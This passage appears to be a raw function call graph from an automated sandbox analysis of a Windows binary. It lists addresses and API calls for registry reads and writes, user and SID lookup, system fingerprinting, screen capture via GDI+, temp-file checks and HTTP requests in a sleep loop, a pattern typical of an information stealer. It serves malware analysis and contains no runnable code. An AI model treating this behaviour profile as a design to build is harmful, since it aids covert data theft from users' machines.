33986->33987 33988 423340 70 API calls 33987->33988 33989 41f8fa 33988->33989 33990 4061f0 114 API calls 33989->33990 33991 41f905 33990->33991 33992 423340 70 API calls 33991->33992 33993 41f917 33992->33993 33994 4061f0 114 API calls 33993->33994 33995 41f922 33994->33995 33996 423340 70 API calls 33995->33996 33997 41f93f 33996->33997 33998 4061f0 114 API calls 33997->33998 33999 41f94a 33998->33999 34674 4248f0 33999->34674 34001 41f95e 34002 425740 27 API calls 34001->34002 34003 41f978 34002->34003 34004 425740 27 API calls 34003->34004 34005 41f995 34004->34005 34006 425740 27 API calls 34005->34006 34007 41f9b2 34006->34007 34008 4248f0 27 API calls 34007->34008 34009 41f9c7 34008->34009 34010 425740 27 API calls 34009->34010 34011 41f9e6 34010->34011 34012 4248f0 27 API calls 34011->34012 34013 41f9fb 34012->34013 34014 425740 27 API calls 34013->34014 34015 41fa1a 34014->34015 34016 4248f0 27 API calls 34015->34016 34017 41fa2f 34016->34017 34018 425740 27 API calls 34017->34018 34019 41fa4e 34018->34019 34020 4248f0 27 API calls 34019->34020 34021 41fa63 34020->34021 34022 425740 27 API calls 34021->34022 34023 41fa82 34022->34023 34024 4248f0 27 API calls 34023->34024 34025 41fa97 34024->34025 34026 425740 27 API calls 34025->34026 34027 41fab6 34026->34027 34028 4248f0 27 API calls 34027->34028 34029 41facb 34028->34029 34030 425740 27 API calls 34029->34030 34031 41faea 34030->34031 34032 4248f0 27 API calls 34031->34032 34033 41faff 34032->34033 34034 425740 27 API calls 34033->34034 34035 41fb1e 34034->34035 34036 4248f0 27 API calls 34035->34036 34037 41fb33 34036->34037 34038 425740 27 API calls 34037->34038 34039 41fb52 34038->34039 34040 425740 27 API calls 34039->34040 34041 41fb74 34040->34041 34042 425740 27 API calls 34041->34042 34043 41fb96 34042->34043 34044 4248f0 27 API calls 34043->34044 34045 41fbab _Ref_count_obj 34044->34045 34046 4207d3 34045->34046 34047 4208a8 34045->34047 34048 423340 70 API calls 34046->34048 34049 423340 70 API calls 34047->34049 34050 4207e9 34048->34050 34051 4208bd 34049->34051 34052 4061f0 114 API calls 34050->34052 34053 423340 70 API calls 34051->34053 34054 4207f4 34052->34054 34055 4208d2 34053->34055 34056 4248f0 27 API calls 34054->34056 34678 404d60 27 API calls _Ref_count_obj 34055->34678 34058 420808 34056->34058 34060 423280 25 API calls 34058->34060 34059 4208e1 34679 40cb00 27 API calls 34059->34679 34071 420816 _Ref_count_obj 34060->34071 34062 4208f2 34063 423340 70 API calls 34062->34063 34064 420907 34063->34064 34065 4061f0 114 API calls 34064->34065 34066 420912 34065->34066 34067 425740 27 API calls 34066->34067 34068 42092c 34067->34068 34069 423280 25 API calls 34068->34069 34069->34071 34070 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34072 420cc6 34070->34072 34071->34070 34072->33815 34073->33832 34075 42336b 34074->34075 34076 423372 34075->34076 34077 4233c4 34075->34077 34078 4233a5 34075->34078 34076->33839 34085 4233b9 _Yarn 34077->34085 34255 4025c0 27 API calls 4 library calls 34077->34255 34079 4233fa 34078->34079 34080 4233ac 34078->34080 34256 4025c0 27 API calls 2 library calls 34079->34256 34254 4025c0 27 API calls 4 library calls 34080->34254 34084 4233b2 34084->34085 34257 42f02c 34084->34257 34085->33839 34263 405da0 34090->34263 34096 40630f 34099 42f02c 25 API calls 34096->34099 34097 4062e9 _Ref_count_obj 34098 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34097->34098 34101 40630b 34098->34101 34102 406314 __fread_nolock 34099->34102 34100 40625f _Ref_count_obj 34100->34096 34100->34097 34101->33835 34103 406377 RegOpenKeyExA 34102->34103 34104 4063d0 RegCloseKey 34103->34104 34105 4063a6 RegQueryValueExA 34103->34105 34106 406400 34104->34106 34105->34104 34106->34106 34278 424250 34106->34278 34108 406480 _Ref_count_obj 34111 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34108->34111 34109 4064a7 34113 42f02c 25 API calls 34109->34113 34110 406418 _Ref_count_obj 34110->34108 34110->34109 34112 4064a3 34111->34112 34112->33835 34114 4064ac RegOpenKeyExA 34113->34114 34116 406517 RegCloseKey 34114->34116 34117 4064ed RegSetValueExA 34114->34117 34118 406528 _Ref_count_obj 34116->34118 34117->34116 34119 4065e6 34118->34119 34120 4065ce _Ref_count_obj 34118->34120 34122 42f02c 25 API calls 34119->34122 34121 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34120->34121 34123 4065e2 34121->34123 34124 4065eb 34122->34124 34123->33835 34293 431b97 34124->34293 34127 406665 RegCloseKey 34129 406676 _Ref_count_obj 34127->34129 34128 406646 RegSetValueExA 34128->34127 34130 40671c _Ref_count_obj 34129->34130 34131 406734 34129->34131 34133 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34130->34133 34132 42f02c 25 API calls 34131->34132 34135 406739 __wsopen_s 34132->34135 34134 406730 34133->34134 34134->33835 34136 423340 70 API calls 34135->34136 34137 4067a0 34136->34137 34138 4061f0 74 API calls 34137->34138 34139 4067ab RegOpenKeyExA 34138->34139 34142 4067d9 __fread_nolock _Ref_count_obj 34139->34142 34141 406d64 34143 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34141->34143 34142->34141 34144 406d80 34142->34144 34145 406829 RegQueryInfoKeyW 34142->34145 34146 406d7c 34143->34146 34147 42f02c 25 API calls 34144->34147 34148 406d58 RegCloseKey 34145->34148 34228 4068a8 _Ref_count_obj 34145->34228 34146->33835 34149 406d85 GdiplusStartup 34147->34149 34148->34141 34151 406e39 34149->34151 34162 406e13 34149->34162 34150 4068b2 RegEnumValueA 34150->34228 34152 407534 34151->34152 34153 406e45 34151->34153 34317 4026a0 27 API calls 34152->34317 34297 4256e0 27 API calls std::_Facet_Register 34153->34297 34155 407539 34158 42f02c 25 API calls 34155->34158 34157 424250 27 API calls 34157->34228 34161 407552 GetUserNameA LookupAccountNameA GetSidIdentifierAuthority 34158->34161 34159 406f60 GetDC 34160 423340 70 API calls 34159->34160 34163 406f8b 34160->34163 34166 423340 70 API calls 34161->34166 34162->34159 34162->34162 34165 4061f0 74 API calls 34163->34165 34168 406f96 34165->34168 34167 407626 34166->34167 34170 4061f0 74 API calls 34167->34170 34171 423340 70 API calls 34168->34171 34169 423340 70 API calls 34169->34228 34172 407631 34170->34172 34173 406fb3 34171->34173 34318 402400 44 API calls 34172->34318 34174 4061f0 74 API calls 34173->34174 34176 406fba 34174->34176 34177 423340 70 API calls 34176->34177 34178 406fcf 34177->34178 34179 4061f0 74 API calls 34178->34179 34182 406fd6 34179->34182 34180 4078c3 34183 42f02c 25 API calls 34180->34183 34181 407649 _Ref_count_obj 34181->34180 34184 423340 70 API calls 34181->34184 34189 423340 70 API calls 34182->34189 34186 4078c8 34183->34186 34185 4076b2 34184->34185 34188 4061f0 74 API calls 34185->34188 34187 42f02c 25 API calls 34186->34187 34191 4078cd 34187->34191 34192 4076bd 34188->34192 34190 407002 34189->34190 34193 4061f0 74 API calls 34190->34193 34194 42f02c 25 API calls 34191->34194 34319 402400 44 API calls 34192->34319 34195 40700d 34193->34195 34196 4078d2 34194->34196 34298 425740 34195->34298 34199 407024 34201 425740 27 API calls 34199->34201 34200 40771a GetSidSubAuthorityCount 34202 4077d2 34200->34202 34225 407734 _Ref_count_obj 34200->34225 34212 40703b _Ref_count_obj 34201->34212 34206 424250 27 API calls 34202->34206 34203 4076d7 _Ref_count_obj 34203->34186 34203->34200 34204 407740 GetSidSubAuthority 34205 423340 70 API calls 34204->34205 34205->34225 34207 407822 34206->34207 34209 424250 27 API calls 34207->34209 34208 4061f0 74 API calls 34208->34225 34211 40786f 34209->34211 34210 40715f _Ref_count_obj 34213 423340 70 API calls 34210->34213 34211->34191 34215 40789b _Ref_count_obj 34211->34215 34212->34155 34212->34210 34214 40719f 34213->34214 34217 4061f0 74 API calls 34214->34217 34218 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34215->34218 34219 4071aa 34217->34219 34220 4078bf 34218->34220 34221 4071b3 34219->34221 34222 4071b5 RegGetValueA 34219->34222 34220->33835 34221->34222 34229 4071e5 _Ref_count_obj 34222->34229 34223 407226 GetSystemMetrics 34226 407234 34223->34226 34227 40722d 34223->34227 34224 40722f GetSystemMetrics 34224->34226 34225->34180 34225->34202 34225->34204 34225->34208 34320 402400 44 API calls 34225->34320 34230 423340 70 API calls 34226->34230 34227->34224 34228->34144 34228->34148 34228->34150 34228->34157 34228->34169 34231 4061f0 74 API calls 34228->34231 34229->34223 34229->34224 34232 40724f 34230->34232 34231->34228 34233 4061f0 74 API calls 34232->34233 34234 40725a RegGetValueA 34233->34234 34236 40728f _Ref_count_obj 34234->34236 34237 4072d3 GetSystemMetrics 34236->34237 34238 4072ca GetSystemMetrics 34236->34238 34240 4072d8 6 API calls 34237->34240 34239 4072d1 34238->34239 34238->34240 34239->34237 34241 4073f8 6 API calls 34240->34241 34242 40736b 34240->34242 34245 40744f _Ref_count_obj 34241->34245 34315 432699 15 API calls 2 library calls 34242->34315 34244 407371 34244->34241 34247 407380 GdipGetImageEncoders 34244->34247 34246 4074e0 GdiplusShutdown 34245->34246 34250 4074f1 _Ref_count_obj 34246->34250 34253 407394 34247->34253 34248 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34249 407530 34248->34249 34249->33835 34250->34248 34252 4073ef 34252->34241 34316 431e51 14 API calls _free 34253->34316 34254->34084 34255->34085 34256->34084 34262 42efb8 25 API calls 3 library calls 34257->34262 34259 42f03b 34260 42f049 __Getctype 11 API calls 34259->34260 34261 42f048 34260->34261 34262->34259 34321 424110 27 API calls 3 library calls 34263->34321 34265 405dd1 34266 406060 34265->34266 34322 424110 27 API calls 3 library calls 34266->34322 34268 4061c6 34271 4051a0 34268->34271 34270 406095 34270->34268 34323 4303c0 40 API calls __Getctype 34270->34323 34272 405432 34271->34272 34276 405204 34271->34276 34272->34100 34274 405355 34274->34272 34326 425220 27 API calls 3 library calls 34274->34326 34276->34274 34324 4303c0 40 API calls __Getctype 34276->34324 34325 425220 27 API calls 3 library calls 34276->34325 34281 424294 34278->34281 34282 42426e _Yarn 34278->34282 34279 42437e 34329 4026a0 27 API calls 34279->34329 34281->34279 34284 4242e8 34281->34284 34285 42430d 34281->34285 34282->34110 34283 424383 34330 4025c0 27 API calls 2 library calls 34283->34330 34284->34283 34327 4025c0 27 API calls 4 library calls 34284->34327 34290 4242f9 _Yarn 34285->34290 34328 4025c0 27 API calls 4 library calls 34285->34328 34287 424388 _Ref_count_obj 34287->34110 34291 424360 _Ref_count_obj 34290->34291 34292 42f02c 25 API calls 34290->34292 34291->34110 34292->34279 34294 431bb2 34293->34294 34331 4312c1 34294->34331 34297->34162 34299 425783 34298->34299 34300 425910 34299->34300 34301 425850 34299->34301 34305 425788 _Yarn 34299->34305 34366 4026a0 27 API calls 34300->34366 34306 425885 34301->34306 34308 4258ab 34301->34308 34303 425915 34367 4025c0 27 API calls 2 library calls 34303->34367 34305->34199 34306->34303 34307 425890 34306->34307 34364 4025c0 27 API calls 4 library calls 34307->34364 34314 42589d _Yarn 34308->34314 34365 4025c0 27 API calls 4 library calls 34308->34365 34310 42f02c 25 API calls 34312 42591f 34310->34312 34313 425896 34313->34310 34313->34314 34314->34199 34315->34244 34316->34252 34318->34181 34319->34203 34320->34225 34321->34265 34322->34270 34323->34270 34324->34276 34325->34276 34326->34274 34327->34290 34328->34290 34330->34287 34349 430147 34331->34349 34333 43130c 34334 42e1f7 __fassign 37 API calls 34333->34334 34341 431318 34334->34341 34335 4312d3 34335->34333 34336 4312e8 34335->34336 34348 40661c RegOpenKeyExA 34335->34348 34356 431262 14 API calls __dosmaperr 34336->34356 34338 4312ed 34357 42f01c 25 API calls ___std_exception_copy 34338->34357 34342 431347 34341->34342 34358 431b43 40 API calls 2 library calls 34341->34358 34345 4313b1 34342->34345 34359 431aec 25 API calls 2 library calls 34342->34359 34360 431aec 25 API calls 2 library calls 34345->34360 34346 431477 34346->34348 34361 431262 14 API calls __dosmaperr 34346->34361 34348->34127 34348->34128 34350 43015f 34349->34350 34351 43014c 34349->34351 34350->34335 34362 431262 14 API calls __dosmaperr 34351->34362 34353 430151 34363 42f01c 25 API calls ___std_exception_copy 34353->34363 34355 43015c 34355->34335 34356->34338 34357->34348 34358->34341 34359->34345 34360->34346 34361->34348 34362->34353 34363->34355 34364->34313 34365->34314 34367->34313 34368->33855 34370 42328e 34369->34370 34371 4232b1 _Ref_count_obj 34369->34371 34370->34371 34372 42f02c 25 API calls 34370->34372 34371->33867 34373 4232fc 34372->34373 34374->33878 34375->33886 34376->33890 34377->33897 34378->33891 34379->33894 34380->33900 34382->33862 34383->33864 34384->33873 34385->33877 34387 407c4a 34386->34387 34401 40795f _Ref_count_obj 34386->34401 34388 407d12 34387->34388 34389 407c73 34387->34389 34681 424760 27 API calls 34388->34681 34390 424250 27 API calls 34389->34390 34398 407c92 _Ref_count_obj 34390->34398 34392 407d17 34394 42f02c 25 API calls 34392->34394 34393 424250 27 API calls 34393->34401 34395 407d1c 34394->34395 34396 407ce8 _Ref_count_obj 34397 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34396->34397 34399 407d0b 34397->34399 34398->34392 34398->34396 34399->33907 34401->34387 34401->34388 34401->34392 34401->34393 34680 425aa0 27 API calls _Yarn 34401->34680 34682 42b650 34402->34682 34404 409436 GetVersionExW 34405 409458 34404->34405 34450 409588 _Ref_count_obj 34404->34450 34407 423340 70 API calls 34405->34407 34406 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34408 409a0d 34406->34408 34409 409467 34407->34409 34496 4043e0 34408->34496 34410 4061f0 114 API calls 34409->34410 34411 409472 34410->34411 34412 423340 70 API calls 34411->34412 34413 409494 34412->34413 34414 4061f0 114 API calls 34413->34414 34415 40949f GetModuleHandleA GetProcAddress 34414->34415 34417 4094c5 _Ref_count_obj 34415->34417 34418 409546 _Ref_count_obj 34417->34418 34421 409a14 34417->34421 34419 409573 GetNativeSystemInfo 34418->34419 34420 409577 GetSystemInfo 34418->34420 34425 40957d 34419->34425 34420->34425 34422 42f02c 25 API calls 34421->34422 34423 409a19 34422->34423 34424 42f02c 25 API calls 34423->34424 34426 409a1e 34424->34426 34427 4096b9 34425->34427 34428 4095df 34425->34428 34425->34450 34430 423340 70 API calls 34427->34430 34429 423340 70 API calls 34428->34429 34432 409600 34429->34432 34431 4096e5 34430->34431 34433 4061f0 114 API calls 34431->34433 34434 4061f0 114 API calls 34432->34434 34435 4096ec 34433->34435 34436 409607 34434->34436 34437 423340 70 API calls 34435->34437 34438 423340 70 API calls 34436->34438 34439 409704 34437->34439 34440 40961f 34438->34440 34441 4061f0 114 API calls 34439->34441 34442 4061f0 114 API calls 34440->34442 34443 40970b 34441->34443 34444 409626 34442->34444 34445 423340 70 API calls 34443->34445 34684 431e8f 40 API calls 34444->34684 34447 40973c 34445->34447 34449 4061f0 114 API calls 34447->34449 34448 409651 34448->34423 34448->34450 34451 409743 34449->34451 34450->34406 34685 4091b0 119 API calls 3 library calls 34451->34685 34453 409752 34454 423340 70 API calls 34453->34454 34455 40978d 34454->34455 34456 4061f0 114 API calls 34455->34456 34457 409794 34456->34457 34458 423340 70 API calls 34457->34458 34459 4097ac 34458->34459 34460 4061f0 114 API calls 34459->34460 34461 4097b3 34460->34461 34462 423340 70 API calls 34461->34462 34463 4097e4 34462->34463 34464 4061f0 114 API calls 34463->34464 34465 4097eb 34464->34465 34686 4091b0 119 API calls 3 library calls 34465->34686 34467 4097fa 34468 423340 70 API calls 34467->34468 34469 409835 34468->34469 34470 4061f0 114 API calls 34469->34470 34471 40983c 34470->34471 34472 423340 70 API calls 34471->34472 34473 409854 34472->34473 34474 4061f0 114 API calls 34473->34474 34475 40985b 34474->34475 34476 423340 70 API calls 34475->34476 34477 40988c 34476->34477 34478 4061f0 114 API calls 34477->34478 34479 409893 34478->34479 34687 4091b0 119 API calls 3 library calls 34479->34687 34481 4098a2 34482 423340 70 API calls 34481->34482 34483 4098dd 34482->34483 34484 4061f0 114 API calls 34483->34484 34485 4098e4 34484->34485 34486 423340 70 API calls 34485->34486 34487 4098fc 34486->34487 34488 4061f0 114 API calls 34487->34488 34489 409903 34488->34489 34490 423340 70 API calls 34489->34490 34491 409934 34490->34491 34492 4061f0 114 API calls 34491->34492 34493 40993b 34492->34493 34688 4091b0 119 API calls 3 library calls 34493->34688 34495 40994a 34495->34450 34497 404404 34496->34497 34497->34497 34498 40447d 34497->34498 34499 424250 27 API calls 34497->34499 34500 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34498->34500 34499->34498 34501 40448c 34500->34501 34502 409a20 34501->34502 34503 42b650 __fread_nolock 34502->34503 34504 409a85 GetVersionExW 34503->34504 34505 409aa3 34504->34505 34506 409aad 34504->34506 34508 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34505->34508 34507 423340 70 API calls 34506->34507 34509 409abc 34507->34509 34510 409c05 34508->34510 34511 4061f0 114 API calls 34509->34511 34510->33919 34512 409ac7 34511->34512 34513 423340 70 API calls 34512->34513 34514 409ae9 34513->34514 34515 4061f0 114 API calls 34514->34515 34516 409af4 34515->34516 34517 409afd 34516->34517 34518 409aff GetModuleHandleA GetProcAddress 34516->34518 34517->34518 34519 409b1a _Ref_count_obj 34518->34519 34520 409b97 _Ref_count_obj 34519->34520 34522 409c0c 34519->34522 34521 409bc8 GetSystemInfo 34520->34521 34525 409bc4 34520->34525 34521->34525 34523 42f02c 25 API calls 34522->34523 34524 409c11 34523->34524 34525->34505 34527 40b2e0 34526->34527 34527->34527 34528 40b331 34527->34528 34529 40b4ab 34527->34529 34535 40b2f4 _Yarn 34527->34535 34703 4256e0 27 API calls std::_Facet_Register 34528->34703 34704 4026a0 27 API calls 34529->34704 34531 40b4b0 34533 42f02c 25 API calls 34531->34533 34536 40b4b5 34533->34536 34689 423010 34535->34689 34537 40b483 _Ref_count_obj 34538 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34537->34538 34540 40b4a7 34538->34540 34539 40b3e7 34539->34531 34539->34537 34541 40b700 34540->34541 34542 423340 70 API calls 34541->34542 34543 40b742 34542->34543 34544 4061f0 114 API calls 34543->34544 34545 40b74a 34544->34545 34709 40a270 GetTempPathA 34545->34709 34548 425740 27 API calls 34549 40b76f GetFileAttributesA 34548->34549 34551 40b788 _Ref_count_obj 34549->34551 34550 40c689 34553 42f02c 25 API calls 34550->34553 34551->34550 34552 40b853 _Ref_count_obj 34551->34552 34555 423340 70 API calls 34552->34555 34665 40b861 34552->34665 34554 40c6c5 34553->34554 34556 40b87c 34555->34556 34558 4061f0 114 API calls 34556->34558 34557 424250 27 API calls 34559 40c675 GetModuleFileNameA 34557->34559 34560 40b884 34558->34560 34559->33939 34561 40a270 115 API calls 34560->34561 34562 40b898 34561->34562 34563 425740 27 API calls 34562->34563 34564 40b8a9 GetFileAttributesA 34563->34564 34565 40b8c2 _Ref_count_obj 34564->34565 34566 423340 70 API calls 34565->34566 34565->34665 34567 40b9b6 34566->34567 34568 4061f0 114 API calls 34567->34568 34569 40b9be 34568->34569 34570 40a270 115 API calls 34569->34570 34571 40b9d2 34570->34571 34572 425740 27 API calls 34571->34572 34573 40b9e3 GetFileAttributesA 34572->34573 34575 40b9fc _Ref_count_obj 34573->34575 34574 423340 70 API calls 34576 40baf0 34574->34576 34575->34574 34575->34665 34577 4061f0 114 API calls 34576->34577 34578 40baf8 34577->34578 34579 40a270 115 API calls 34578->34579 34580 40bb0c 34579->34580 34581 425740 27 API calls 34580->34581 34582 40bb1d GetFileAttributesA 34581->34582 34584 40bb36 _Ref_count_obj 34582->34584 34583 423340 70 API calls 34585 40bc2a 34583->34585 34584->34583 34584->34665 34586 4061f0 114 API calls 34585->34586 34587 40bc32 34586->34587 34588 40a270 115 API calls 34587->34588 34589 40bc46 34588->34589 34590 425740 27 API calls 34589->34590 34591 40bc57 GetFileAttributesA 34590->34591 34592 40bc70 _Ref_count_obj 34591->34592 34593 423340 70 API calls 34592->34593 34592->34665 34594 40bd64 34593->34594 34595 4061f0 114 API calls 34594->34595 34596 40bd6c 34595->34596 34597 40a270 115 API calls 34596->34597 34598 40bd80 34597->34598 34599 425740 27 API calls 34598->34599 34600 40bd91 GetFileAttributesA 34599->34600 34601 40bdaa _Ref_count_obj 34600->34601 34602 423340 70 API calls 34601->34602 34601->34665 34603 40be9e 34602->34603 34604 4061f0 114 API calls 34603->34604 34605 40bea6 34604->34605 34606 40a270 115 API calls 34605->34606 34607 40beba 34606->34607 34608 425740 27 API calls 34607->34608 34609 40becb GetFileAttributesA 34608->34609 34610 40bee4 _Ref_count_obj 34609->34610 34611 423340 70 API calls 34610->34611 34610->34665 34612 40bfd8 34611->34612 34613 4061f0 114 API calls 34612->34613 34614 40bfe0 34613->34614 34615 40a270 115 API calls 34614->34615 34616 40bff4 34615->34616 34617 425740 27 API calls 34616->34617 34618 40c005 GetFileAttributesA 34617->34618 34619 40c01e _Ref_count_obj 34618->34619 34620 423340 70 API calls 34619->34620 34619->34665 34621 40c112 34620->34621 34622 4061f0 114 API calls 34621->34622 34623 40c11a 34622->34623 34624 40a270 115 API calls 34623->34624 34625 40c12e 34624->34625 34626 425740 27 API calls 34625->34626 34627 40c13f GetFileAttributesA 34626->34627 34628 40c158 _Ref_count_obj 34627->34628 34629 423340 70 API calls 34628->34629 34628->34665 34630 40c24c 34629->34630 34631 4061f0 114 API calls 34630->34631 34632 40c254 34631->34632 34633 40a270 115 API calls 34632->34633 34634 40c268 34633->34634 34635 425740 27 API calls 34634->34635 34636 40c279 GetFileAttributesA 34635->34636 34637 40c292 _Ref_count_obj 34636->34637 34638 423340 70 API calls 34637->34638 34637->34665 34639 40c386 34638->34639 34640 4061f0 114 API calls 34639->34640 34641 40c38e 34640->34641 34642 40a270 115 API calls 34641->34642 34643 40c3a2 34642->34643 34644 425740 27 API calls 34643->34644 34645 40c3b3 GetFileAttributesA 34644->34645 34646 40c3cc _Ref_count_obj 34645->34646 34647 423340 70 API calls 34646->34647 34646->34665 34648 40c4c0 34647->34648 34649 4061f0 114 API calls 34648->34649 34650 40c4cb 34649->34650 34651 40a270 115 API calls 34650->34651 34652 40c4e2 34651->34652 34653 425740 27 API calls 34652->34653 34654 40c4f3 GetFileAttributesA 34653->34654 34655 40c50c _Ref_count_obj 34654->34655 34656 4093d0 124 API calls 34655->34656 34655->34665 34657 40c61a 34656->34657 34658 4093d0 124 API calls 34657->34658 34657->34665 34659 40c624 34658->34659 34660 4093d0 124 API calls 34659->34660 34659->34665 34661 40c62e 34660->34661 34662 4093d0 124 API calls 34661->34662 34661->34665 34663 40c638 34662->34663 34664 4093d0 124 API calls 34663->34664 34663->34665 34664->34665 34665->34557 34667 409e46 34666->34667 34668 409e78 _Ref_count_obj 34667->34668 34670 409e93 34667->34670 34669 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34668->34669 34671 409e8f 34669->34671 34672 42f02c 25 API calls 34670->34672 34671->33944 34673 409e98 34672->34673 34675 424909 34674->34675 34676 42491d _Yarn 34675->34676 34726 4254c0 27 API calls 3 library calls 34675->34726 34676->34001 34678->34059 34679->34062 34680->34401 34683 42b667 34682->34683 34683->34404 34683->34683 34684->34448 34685->34453 34686->34467 34687->34481 34688->34495 34690 423114 _Yarn _Ref_count_obj 34689->34690 34691 42302b 34689->34691 34690->34539 34691->34690 34692 4231a1 34691->34692 34696 4230c1 34691->34696 34697 42309a 34691->34697 34702 4230ab _Yarn 34691->34702 34707 4026a0 27 API calls 34692->34707 34694 4231a6 34708 4025c0 27 API calls 2 library calls 34694->34708 34696->34702 34706 4025c0 27 API calls 4 library calls 34696->34706 34697->34694 34705 4025c0 27 API calls 4 library calls 34697->34705 34698 4231ab 34701 42f02c 25 API calls 34701->34692 34702->34690 34702->34701 34703->34535 34705->34702 34706->34702 34708->34698 34710 423340 70 API calls 34709->34710 34711 40a2cc 34710->34711 34712 4061f0 114 API calls 34711->34712 34713 40a2d7 34712->34713 34714 424250 27 API calls 34713->34714 34715 40a32d 34714->34715 34716 424250 27 API calls 34715->34716 34717 40a389 34716->34717 34718 425740 27 API calls 34717->34718 34721 40a3a2 _Ref_count_obj 34718->34721 34719 40a43e _Ref_count_obj 34722 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34719->34722 34720 40a465 34723 42f02c 25 API calls 34720->34723 34721->34719 34721->34720 34724 40a461 34722->34724 34725 40a46a 34723->34725 34724->34548 34726->34676 34730 420d20 34727->34730 34728 423340 70 API calls 34728->34730 34729 4061f0 114 API calls 34729->34730 34730->34728 34730->34729 34733 41eca0 34730->34733 34734 41ecdc 34733->34734 34739 41f3ce _Ref_count_obj 34733->34739 34735 423340 70 API calls 34734->34735 34734->34739 34738 41ecfd 34735->34738 34736 41f444 _Ref_count_obj 34740 4299c0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 34736->34740 34737 41f4a1 34742 42f02c 25 API calls 34737->34742 34741 4061f0 114 API calls 34738->34741 34739->34736 34739->34737 34743 41f466 Sleep 34740->34743 34744 41ed04 34741->34744 34745 41f4a6 34742->34745 34743->34730 34746 423340 70 API calls 34744->34746 34747 41ed16 34746->34747 34748 423340 70 API calls 34747->34748 34749 41ed28 34748->34749 34855 4105b0 34749->34855 34752 423340 70 API calls 34753 41ed49 34752->34753 34754 423340 70 API calls 34753->34754 34755 41ed61 34754->34755 34756 4061f0 114 API calls 34755->34756 34757 41ed68 34756->34757 34886 409c20 34757->34886 34760 41efe9 34762 423340 70 API calls 34760->34762 34820 41f488 34760->34820 34761 423340 70 API calls 34763 41ed90 34761->34763 34764 41f01b 34762->34764 34765 423340 70 API calls 34763->34765 34766 423340 70 API calls 34764->34766 34767 41eda8 34765->34767 34768 41f030 34766->34768 34769 4061f0 114 API calls 34767->34769 34770 423340 70 API calls 34768->34770 34771 41edaf 34769->34771 34772 41f042 34770->34772 34773 409c20 27 API calls 34771->34773 34774 4105b0 121 API calls 34772->34774 34776 41edbb 34773->34776 34775 41f04e 34774->34775 34777 423340 70 API calls 34775->34777 34776->34760 34779 423340 70 API calls 34776->34779 34778 41f063 34777->34778 34780 423340 70 API calls 34778->34780 34781 41edd8 34779->34781 34782 41f07b 34780->34782 34783 4061f0 114 API calls 34781->34783 34784 4061f0 114 API calls 34782->34784 34787 41ede0 34783->34787 34785 41f082 34784->34785 34786 409c20 27 API calls 34785->34786 34788 41f08e 34786->34788 34789 424250 27 API calls 34787->34789 34790 423340 70 API calls 34788->34790 34791 41f35b _Ref_count_obj 34788->34791 34792 41ee4e 34789->34792 34793 41f0aa 34790->34793 34791->34739 34794 41f49c 34791->34794 34795 423280 25 API calls 34792->34795 34796 423340 70 API calls 34793->34796 34797 42f02c 25 API calls 34794->34797 34802 41ee5a _Ref_count_obj 34795->34802 34798 41f0c2 34796->34798 34797->34737 34799 4061f0 114 API calls 34798->34799 34800 41f0c9 34799->34800 34801 409c20 27 API calls 34800->34801 34804 41f0d5 34801->34804 34803 423340 70 API calls 34802->34803 34805 41eed5 34803->34805 34804->34791 34807 423340 70 API calls 34804->34807 34806 4061f0 114 API calls 34805->34806 34810 41eedd 34806->34810 34808 41f0f2 34807->34808 34809 4061f0 114 API calls 34808->34809 34814 41f0fa 34809->34814 34811 424250 27 API calls 34810->34811 34812 41ef3b 34811->34812 34813 423280 25 API calls 34812->34813 34824 41ef47 _Ref_count_obj 34813->34824 34815 41f483 34814->34815 34816 41f14b 34814->34816 34901 424760 27 API calls 34815->34901 34817 424250 27 API calls 34816->34817 34819 41f168 34817->34819 34822 423280 25 API calls 34819->34822 34902 42869c 27 API calls 2 library calls 34820->34902 34831 41f174 _Ref_count_obj 34822->34831 34823 41f492 34827 42f02c 25 API calls 34823->34827 34824->34760 34898 40b5f0 114 API calls 3 library calls 34824->34898 34826 41efc1 34826->34760 34899 431262 14 API calls __dosmaperr 34826->34899 34828 41f497 34827->34828 34832 42f02c 25 API calls 34828->34832 34829 41f1d6 _Ref_count_obj 34833 423340 70 API calls 34829->34833 34831->34823 34831->34829 34832->34794 34835 41f1ef 34833->34835 34834 41efca 34836 431b97 40 API calls 34834->34836 34837 4061f0 114 API calls 34835->34837 34836->34760 34838 41f1f7 34837->34838 34839 424250 27 API calls 34838->34839 34840 41f255 34839->34840 34841 423280 25 API calls 34840->34841 34844 41f261 _Ref_count_obj 34841->34844 34842 41f2c3 _Ref_count_obj 34843 423340 70 API calls 34842->34843 34845 41f2de 34843->34845 34844->34828 34844->34842 34846 423340 70 API calls 34845->34846 34847 41f2f3 34846->34847 34848 423340 70 API calls 34847->34848 34849 41f30e 34848->34849 34850 4061f0 114 API calls 34849->34850 34851 41f315 34850->34851 34852 424250 27 API calls 34851->34852 34853 41f352 34852->34853 34900 41e870 114 API calls 2 library calls 34853->34900 34856 410602 34855->34856 34857 410a07 34855->34857 34856->34857 34859 410616 Sleep InternetOpenW InternetConnectA 34856->34859 34858 424250 27 API calls 34857->34858 34865 4109b4 _Ref_count_obj 34858->34865 34860 423340 70 API calls 34859->34860 34861 4106a2 34860->34861 34863 4061f0 114 API calls 34861->34863 34862 410adb 34864 42f02c 25 API calls 34862->34864 34867 4106ad HttpOpenRequestA 34863->34867 34868 410ae0 34864->34868 34865->34862 34869 410a02 _Ref_count_obj 34865->34869 34866 4299c0 